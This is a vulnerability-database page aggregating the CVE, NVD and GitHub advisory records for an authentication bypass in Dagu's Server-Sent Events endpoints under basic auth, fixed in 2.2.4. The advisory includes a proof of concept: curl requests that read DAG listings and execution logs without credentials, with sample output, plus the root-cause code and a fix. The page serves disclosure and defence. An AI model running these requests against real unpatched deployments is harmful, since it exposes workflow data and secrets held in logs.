CVE-2026-31882 (GCVE-0-2026-31882)

Vulnerability from cvelistv5 – Published: 2026-03-13 19:28 – Updated: 2026-03-13 19:43

Title

Dagu SSE Authentication Bypass in Basic Auth Mode

Summary

Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, when Dagu is configured with HTTP Basic authentication (DAGU_AUTH_MODE=basic), all Server-Sent Events (SSE) endpoints are accessible without any credentials. This allows unauthenticated attackers to access real-time DAG execution data, workflow configurations, execution logs, and queue status — bypassing the authentication that protects the REST API. The buildStreamAuthOptions() function builds authentication options for SSE/streaming endpoints. When the auth mode is basic, it returns an auth.Options struct with BasicAuthEnabled: true but AuthRequired defaults to false (Go zero value). The authentication middleware at internal/service/frontend/auth/middleware.go allows unauthenticated requests when AuthRequired is false. This vulnerability is fixed in 2.2.4.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-306 - Missing Authentication for Critical Function

Assigner

GitHub_M

References

URL

Tags

	https://github.com/dagu-org/dagu/security/advisor…	x_refsource_CONFIRM
	https://github.com/dagu-org/dagu/pull/1752	x_refsource_MISC
	https://github.com/dagu-org/dagu/commit/064616c9b…	x_refsource_MISC
	https://github.com/dagu-org/dagu/releases/tag/v2.2.4	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	dagu-org	dagu	Affected: < 2.2.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-31882",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-13T19:43:49.630099Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-13T19:43:56.406Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "dagu",
          "vendor": "dagu-org",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.2.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, when Dagu is configured with HTTP Basic authentication (DAGU_AUTH_MODE=basic), all Server-Sent Events (SSE) endpoints are accessible without any credentials. This allows unauthenticated attackers to access real-time DAG execution data, workflow configurations, execution logs, and queue status \u2014 bypassing the authentication that protects the REST API. The buildStreamAuthOptions() function builds authentication options for SSE/streaming endpoints. When the auth mode is basic, it returns an auth.Options struct with BasicAuthEnabled: true but AuthRequired defaults to false (Go zero value). The authentication middleware at internal/service/frontend/auth/middleware.go allows unauthenticated requests when AuthRequired is false. This vulnerability is fixed in 2.2.4."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-306",
              "description": "CWE-306: Missing Authentication for Critical Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-13T19:28:25.615Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/dagu-org/dagu/security/advisories/GHSA-9wmw-9wph-2vwp",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/dagu-org/dagu/security/advisories/GHSA-9wmw-9wph-2vwp"
        },
        {
          "name": "https://github.com/dagu-org/dagu/pull/1752",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/dagu-org/dagu/pull/1752"
        },
        {
          "name": "https://github.com/dagu-org/dagu/commit/064616c9b80c04824c1c7c357308f77f3f24d775",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/dagu-org/dagu/commit/064616c9b80c04824c1c7c357308f77f3f24d775"
        },
        {
          "name": "https://github.com/dagu-org/dagu/releases/tag/v2.2.4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/dagu-org/dagu/releases/tag/v2.2.4"
        }
      ],
      "source": {
        "advisory": "GHSA-9wmw-9wph-2vwp",
        "discovery": "UNKNOWN"
      },
      "title": "Dagu SSE Authentication Bypass in Basic Auth Mode"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-31882",
    "datePublished": "2026-03-13T19:28:25.615Z",
    "dateReserved": "2026-03-09T21:59:02.686Z",
    "dateUpdated": "2026-03-13T19:43:56.406Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-31882",
      "date": "2026-04-15",
      "epss": "0.00267",
      "percentile": "0.5024"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-31882\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-13T19:54:37.000\",\"lastModified\":\"2026-03-18T20:14:20.940\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, when Dagu is configured with HTTP Basic authentication (DAGU_AUTH_MODE=basic), all Server-Sent Events (SSE) endpoints are accessible without any credentials. This allows unauthenticated attackers to access real-time DAG execution data, workflow configurations, execution logs, and queue status \u2014 bypassing the authentication that protects the REST API. The buildStreamAuthOptions() function builds authentication options for SSE/streaming endpoints. When the auth mode is basic, it returns an auth.Options struct with BasicAuthEnabled: true but AuthRequired defaults to false (Go zero value). The authentication middleware at internal/service/frontend/auth/middleware.go allows unauthenticated requests when AuthRequired is false. This vulnerability is fixed in 2.2.4.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-306\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:dagu:dagu:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.2.4\",\"matchCriteriaId\":\"681DF7E8-8500-4F63-8E04-FC8AB4CAFD3A\"}]}]}],\"references\":[{\"url\":\"https://github.com/dagu-org/dagu/commit/064616c9b80c04824c1c7c357308f77f3f24d775\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/dagu-org/dagu/pull/1752\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/dagu-org/dagu/releases/tag/v2.2.4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/dagu-org/dagu/security/advisories/GHSA-9wmw-9wph-2vwp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-31882\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-13T19:43:49.630099Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-13T19:43:53.328Z\"}}], \"cna\": {\"title\": \"Dagu SSE Authentication Bypass in Basic Auth Mode\", \"source\": {\"advisory\": \"GHSA-9wmw-9wph-2vwp\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"dagu-org\", \"product\": \"dagu\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.2.4\"}]}], \"references\": [{\"url\": \"https://github.com/dagu-org/dagu/security/advisories/GHSA-9wmw-9wph-2vwp\", \"name\": \"https://github.com/dagu-org/dagu/security/advisories/GHSA-9wmw-9wph-2vwp\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/dagu-org/dagu/pull/1752\", \"name\": \"https://github.com/dagu-org/dagu/pull/1752\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/dagu-org/dagu/commit/064616c9b80c04824c1c7c357308f77f3f24d775\", \"name\": \"https://github.com/dagu-org/dagu/commit/064616c9b80c04824c1c7c357308f77f3f24d775\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/dagu-org/dagu/releases/tag/v2.2.4\", \"name\": \"https://github.com/dagu-org/dagu/releases/tag/v2.2.4\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, when Dagu is configured with HTTP Basic authentication (DAGU_AUTH_MODE=basic), all Server-Sent Events (SSE) endpoints are accessible without any credentials. This allows unauthenticated attackers to access real-time DAG execution data, workflow configurations, execution logs, and queue status \\u2014 bypassing the authentication that protects the REST API. The buildStreamAuthOptions() function builds authentication options for SSE/streaming endpoints. When the auth mode is basic, it returns an auth.Options struct with BasicAuthEnabled: true but AuthRequired defaults to false (Go zero value). The authentication middleware at internal/service/frontend/auth/middleware.go allows unauthenticated requests when AuthRequired is false. This vulnerability is fixed in 2.2.4.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-306\", \"description\": \"CWE-306: Missing Authentication for Critical Function\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-13T19:28:25.615Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-31882\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-13T19:43:56.406Z\", \"dateReserved\": \"2026-03-09T21:59:02.686Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-13T19:28:25.615Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-31882

Vulnerability from fkie_nvd - Published: 2026-03-13 19:54 - Updated: 2026-03-18 20:14

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/dagu-org/dagu/commit/064616c9b80c04824c1c7c357308f77f3f24d775	Patch
security-advisories@github.com	https://github.com/dagu-org/dagu/pull/1752	Issue Tracking, Patch
security-advisories@github.com	https://github.com/dagu-org/dagu/releases/tag/v2.2.4	Product, Release Notes
security-advisories@github.com	https://github.com/dagu-org/dagu/security/advisories/GHSA-9wmw-9wph-2vwp	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	dagu	dagu	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:dagu:dagu:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "681DF7E8-8500-4F63-8E04-FC8AB4CAFD3A",
              "versionEndExcluding": "2.2.4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, when Dagu is configured with HTTP Basic authentication (DAGU_AUTH_MODE=basic), all Server-Sent Events (SSE) endpoints are accessible without any credentials. This allows unauthenticated attackers to access real-time DAG execution data, workflow configurations, execution logs, and queue status \u2014 bypassing the authentication that protects the REST API. The buildStreamAuthOptions() function builds authentication options for SSE/streaming endpoints. When the auth mode is basic, it returns an auth.Options struct with BasicAuthEnabled: true but AuthRequired defaults to false (Go zero value). The authentication middleware at internal/service/frontend/auth/middleware.go allows unauthenticated requests when AuthRequired is false. This vulnerability is fixed in 2.2.4."
    },
    {
      "lang": "es",
      "value": "Dagu es un motor de flujo de trabajo con una interfaz de usuario web integrada. Antes de la versi\u00f3n 2.2.4, cuando Dagu est\u00e1 configurado con autenticaci\u00f3n HTTP b\u00e1sica (DAGU_AUTH_MODE=basic), todos los puntos finales de Server-Sent Events (SSE) son accesibles sin ninguna credencial. Esto permite a atacantes no autenticados acceder a datos de ejecuci\u00f3n de DAG en tiempo real, configuraciones de flujo de trabajo, registros de ejecuci\u00f3n y estado de la cola \u2014 eludiendo la autenticaci\u00f3n que protege la API REST. La funci\u00f3n buildStreamAuthOptions() construye opciones de autenticaci\u00f3n para puntos finales SSE/streaming. Cuando el modo de autenticaci\u00f3n es b\u00e1sico, devuelve una estructura auth.Options con BasicAuthEnabled: true pero AuthRequired por defecto es false (valor cero de Go). El middleware de autenticaci\u00f3n en internal/service/frontend/auth/middleware.go permite solicitudes no autenticadas cuando AuthRequired es false. Esta vulnerabilidad se corrige en la versi\u00f3n 2.2.4."
    }
  ],
  "id": "CVE-2026-31882",
  "lastModified": "2026-03-18T20:14:20.940",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-13T19:54:37.000",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/dagu-org/dagu/commit/064616c9b80c04824c1c7c357308f77f3f24d775"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "https://github.com/dagu-org/dagu/pull/1752"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/dagu-org/dagu/releases/tag/v2.2.4"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/dagu-org/dagu/security/advisories/GHSA-9wmw-9wph-2vwp"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-306"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-9WMW-9WPH-2VWP

Vulnerability from github – Published: 2026-03-13 15:05 – Updated: 2026-03-16 17:06

Summary

Dagu: SSE Authentication Bypass in Basic Auth Mode

Details

SSE Authentication Bypass in Basic Auth Mode

Summary

When Dagu is configured with HTTP Basic authentication (DAGU_AUTH_MODE=basic), all Server-Sent Events (SSE) endpoints are accessible without any credentials. This allows unauthenticated attackers to access real-time DAG execution data, workflow configurations, execution logs, and queue status — bypassing the authentication that protects the REST API.

Severity

HIGH (CVSS 3.1: 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Affected Versions

dagu v2.2.3 (latest) and likely all versions with basic auth support

Affected Component

internal/service/frontend/server.go — buildStreamAuthOptions() function (lines 1177–1201)

Root Cause

The buildStreamAuthOptions() function builds authentication options for SSE/streaming endpoints. When the auth mode is basic, it returns an auth.Options struct with BasicAuthEnabled: true but AuthRequired defaults to false (Go zero value):

// server.go:1195-1201
if authCfg.Mode == config.AuthModeBasic {
    return auth.Options{
        Realm:            realm,
        BasicAuthEnabled: true,
        Creds:            map[string]string{authCfg.Basic.Username: authCfg.Basic.Password},
        // AuthRequired is NOT set — defaults to false
    }
}

The authentication middleware at internal/service/frontend/auth/middleware.go:181-183 allows unauthenticated requests when AuthRequired is false:

// No credentials provided
// If auth is not required, allow the request through
if !opts.AuthRequired {
    next.ServeHTTP(w, r)
    return
}

The developers left a FIXME comment (line 1193) acknowledging this issue:

// FIXME: add a session-token mechanism for basic-auth users so browser
// EventSource requests can authenticate via the ?token= query parameter.

Exposed SSE Endpoints

All SSE routes are affected (server.go:1004-1019):

Endpoint	Data Leaked
`/api/v1/events/dags`	All DAG names, descriptions, file paths, schedules, tags, execution status
`/api/v1/events/dags/{fileName}`	Individual DAG configuration details
`/api/v1/events/dags/{fileName}/dag-runs`	DAG execution history
`/api/v1/events/dag-runs`	All active DAG runs across the system
`/api/v1/events/dag-runs/{name}/{dagRunId}`	Specific DAG run status and node details
`/api/v1/events/dag-runs/{name}/{dagRunId}/logs`	Execution logs (may contain secrets, credentials, API keys)
`/api/v1/events/dag-runs/{name}/{dagRunId}/logs/steps/{stepName}`	Step-level stdout/stderr logs
`/api/v1/events/queues`	Queue status and pending work items
`/api/v1/events/queues/{name}/items`	Queue item details
`/api/v1/events/docs-tree`	Documentation tree
`/api/v1/events/docs/*`	Documentation content

Additionally, the Agent SSE stream uses the same auth options (server.go:1166).

Proof of Concept

Setup

# Start Dagu with basic auth
export DAGU_AUTH_MODE=basic
export DAGU_AUTH_BASIC_USERNAME=admin
export DAGU_AUTH_BASIC_PASSWORD=secret123
dagu start-all

Verify REST API requires auth

# Regular API — returns 401 Unauthorized
curl -s -o /dev/null -w "%{http_code}" http://localhost:8080/api/v1/dags
# Output: 401

# With credentials — returns 200
curl -s -o /dev/null -w "%{http_code}" -u admin:secret123 http://localhost:8080/api/v1/dags
# Output: 200

Exploit SSE bypass

# SSE endpoint WITHOUT any credentials — returns 200 with full data
curl -s -N http://localhost:8080/api/v1/events/dags

Output (truncated):

event: connected
data: {"topic":"dagslist:"}

event: data
data: {"dags":[{"dag":{"name":"example-01-basic-sequential","schedule":[],...},
"filePath":"/home/user/.config/dagu/dags/example-01-basic-sequential.yaml",
"latestDAGRun":{"dagRunId":"...","status":4,"statusLabel":"succeeded",...}},
...]}

# Access execution logs without credentials
curl -s -N http://localhost:8080/api/v1/events/dag-runs/{dagName}/{runId}/logs

Output:

event: data
data: {"schedulerLog":{"content":"...step execution details, parameters, outputs..."},"stepLogs":[...]}

Wrong credentials are rejected

# Invalid credentials — returns 401 (auth validates IF provided, but doesn't REQUIRE it)
curl -s -o /dev/null -w "%{http_code}" -u wrong:wrong http://localhost:8080/api/v1/events/dags
# Output: 401

Impact

An unauthenticated network attacker can:

Enumerate all workflows: DAG names, descriptions, file paths, schedules, and tags
Monitor execution in real-time: Track which workflows are running, their status, and when they complete
Read execution logs: Access stdout/stderr of workflow steps, which commonly contain sensitive data (API keys, database credentials, tokens, internal hostnames)
Map infrastructure: File paths and workflow configurations reveal server directory structure and deployment details
Observe queue state: Understand pending work items and system load

This is especially critical in environments where: - Workflows process sensitive data (credentials, PII, financial data) - DAG parameters contain secrets passed at runtime - Log output includes API responses or database queries with sensitive content

Suggested Fix

Set AuthRequired: true for basic auth mode and implement the session-token mechanism referenced in the FIXME comment:

if authCfg.Mode == config.AuthModeBasic {
    return auth.Options{
        Realm:            realm,
        BasicAuthEnabled: true,
        AuthRequired:     true,  // Require authentication
        Creds:            map[string]string{authCfg.Basic.Username: authCfg.Basic.Password},
    }
}

For browser SSE compatibility, implement a session token that can be passed via the ?token= query parameter (the QueryTokenMiddleware already exists at auth/middleware.go:39 to convert query params to Bearer tokens).

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "dagu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.2.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-31882"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T15:05:32Z",
    "nvd_published_at": "2026-03-13T19:54:37Z",
    "severity": "HIGH"
  },
  "details": "# SSE Authentication Bypass in Basic Auth Mode\n\n## Summary\n\nWhen Dagu is configured with HTTP Basic authentication (`DAGU_AUTH_MODE=basic`), all Server-Sent Events (SSE) endpoints are accessible without any credentials. This allows unauthenticated attackers to access real-time DAG execution data, workflow configurations, execution logs, and queue status \u2014 bypassing the authentication that protects the REST API.\n\n## Severity\n\n**HIGH** (CVSS 3.1: 7.5 \u2014 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n## Affected Versions\n\n- dagu v2.2.3 (latest) and likely all versions with basic auth support\n\n## Affected Component\n\n`internal/service/frontend/server.go` \u2014 `buildStreamAuthOptions()` function (lines 1177\u20131201)\n\n## Root Cause\n\nThe `buildStreamAuthOptions()` function builds authentication options for SSE/streaming endpoints. When the auth mode is `basic`, it returns an `auth.Options` struct with `BasicAuthEnabled: true` but `AuthRequired` defaults to `false` (Go zero value):\n\n```go\n// server.go:1195-1201\nif authCfg.Mode == config.AuthModeBasic {\n    return auth.Options{\n        Realm:            realm,\n        BasicAuthEnabled: true,\n        Creds:            map[string]string{authCfg.Basic.Username: authCfg.Basic.Password},\n        // AuthRequired is NOT set \u2014 defaults to false\n    }\n}\n```\n\nThe authentication middleware at `internal/service/frontend/auth/middleware.go:181-183` allows unauthenticated requests when `AuthRequired` is false:\n\n```go\n// No credentials provided\n// If auth is not required, allow the request through\nif !opts.AuthRequired {\n    next.ServeHTTP(w, r)\n    return\n}\n```\n\nThe developers left a FIXME comment (line 1193) acknowledging this issue:\n```\n// FIXME: add a session-token mechanism for basic-auth users so browser\n// EventSource requests can authenticate via the ?token= query parameter.\n```\n\n## Exposed SSE Endpoints\n\nAll SSE routes are affected (`server.go:1004-1019`):\n\n| Endpoint | Data Leaked |\n|----------|-------------|\n| `/api/v1/events/dags` | All DAG names, descriptions, file paths, schedules, tags, execution status |\n| `/api/v1/events/dags/{fileName}` | Individual DAG configuration details |\n| `/api/v1/events/dags/{fileName}/dag-runs` | DAG execution history |\n| `/api/v1/events/dag-runs` | All active DAG runs across the system |\n| `/api/v1/events/dag-runs/{name}/{dagRunId}` | Specific DAG run status and node details |\n| `/api/v1/events/dag-runs/{name}/{dagRunId}/logs` | Execution logs (may contain secrets, credentials, API keys) |\n| `/api/v1/events/dag-runs/{name}/{dagRunId}/logs/steps/{stepName}` | Step-level stdout/stderr logs |\n| `/api/v1/events/queues` | Queue status and pending work items |\n| `/api/v1/events/queues/{name}/items` | Queue item details |\n| `/api/v1/events/docs-tree` | Documentation tree |\n| `/api/v1/events/docs/*` | Documentation content |\n\nAdditionally, the Agent SSE stream uses the same auth options (`server.go:1166`).\n\n## Proof of Concept\n\n### Setup\n```bash\n# Start Dagu with basic auth\nexport DAGU_AUTH_MODE=basic\nexport DAGU_AUTH_BASIC_USERNAME=admin\nexport DAGU_AUTH_BASIC_PASSWORD=secret123\ndagu start-all\n```\n\n### Verify REST API requires auth\n```bash\n# Regular API \u2014 returns 401 Unauthorized\ncurl -s -o /dev/null -w \"%{http_code}\" http://localhost:8080/api/v1/dags\n# Output: 401\n\n# With credentials \u2014 returns 200\ncurl -s -o /dev/null -w \"%{http_code}\" -u admin:secret123 http://localhost:8080/api/v1/dags\n# Output: 200\n```\n\n### Exploit SSE bypass\n```bash\n# SSE endpoint WITHOUT any credentials \u2014 returns 200 with full data\ncurl -s -N http://localhost:8080/api/v1/events/dags\n```\n\n**Output (truncated):**\n```\nevent: connected\ndata: {\"topic\":\"dagslist:\"}\n\nevent: data\ndata: {\"dags\":[{\"dag\":{\"name\":\"example-01-basic-sequential\",\"schedule\":[],...},\n\"filePath\":\"/home/user/.config/dagu/dags/example-01-basic-sequential.yaml\",\n\"latestDAGRun\":{\"dagRunId\":\"...\",\"status\":4,\"statusLabel\":\"succeeded\",...}},\n...]}\n```\n\n```bash\n# Access execution logs without credentials\ncurl -s -N http://localhost:8080/api/v1/events/dag-runs/{dagName}/{runId}/logs\n```\n\n**Output:**\n```\nevent: data\ndata: {\"schedulerLog\":{\"content\":\"...step execution details, parameters, outputs...\"},\"stepLogs\":[...]}\n```\n\n### Wrong credentials are rejected\n```bash\n# Invalid credentials \u2014 returns 401 (auth validates IF provided, but doesn\u0027t REQUIRE it)\ncurl -s -o /dev/null -w \"%{http_code}\" -u wrong:wrong http://localhost:8080/api/v1/events/dags\n# Output: 401\n```\n\n## Impact\n\nAn unauthenticated network attacker can:\n\n1. **Enumerate all workflows**: DAG names, descriptions, file paths, schedules, and tags\n2. **Monitor execution in real-time**: Track which workflows are running, their status, and when they complete\n3. **Read execution logs**: Access stdout/stderr of workflow steps, which commonly contain sensitive data (API keys, database credentials, tokens, internal hostnames)\n4. **Map infrastructure**: File paths and workflow configurations reveal server directory structure and deployment details\n5. **Observe queue state**: Understand pending work items and system load\n\nThis is especially critical in environments where:\n- Workflows process sensitive data (credentials, PII, financial data)\n- DAG parameters contain secrets passed at runtime\n- Log output includes API responses or database queries with sensitive content\n\n## Suggested Fix\n\nSet `AuthRequired: true` for basic auth mode and implement the session-token mechanism referenced in the FIXME comment:\n\n```go\nif authCfg.Mode == config.AuthModeBasic {\n    return auth.Options{\n        Realm:            realm,\n        BasicAuthEnabled: true,\n        AuthRequired:     true,  // Require authentication\n        Creds:            map[string]string{authCfg.Basic.Username: authCfg.Basic.Password},\n    }\n}\n```\n\nFor browser SSE compatibility, implement a session token that can be passed via the `?token=` query parameter (the `QueryTokenMiddleware` already exists at `auth/middleware.go:39` to convert query params to Bearer tokens).",
  "id": "GHSA-9wmw-9wph-2vwp",
  "modified": "2026-03-16T17:06:32Z",
  "published": "2026-03-13T15:05:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dagu-org/dagu/security/advisories/GHSA-9wmw-9wph-2vwp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31882"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dagu-org/dagu/pull/1752"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dagu-org/dagu/commit/064616c9b80c04824c1c7c357308f77f3f24d775"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dagu-org/dagu"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dagu-org/dagu/releases/tag/v2.2.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dagu: SSE Authentication Bypass in Basic Auth Mode"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-31882 (GCVE-0-2026-31882)

FKIE_CVE-2026-31882

GHSA-9WMW-9WPH-2VWP

SSE Authentication Bypass in Basic Auth Mode

Summary

Severity

Affected Versions

Affected Component

Root Cause

Exposed SSE Endpoints

Proof of Concept

Setup

Verify REST API requires auth

Exploit SSE bypass

Wrong credentials are rejected

Impact

Suggested Fix

Tags

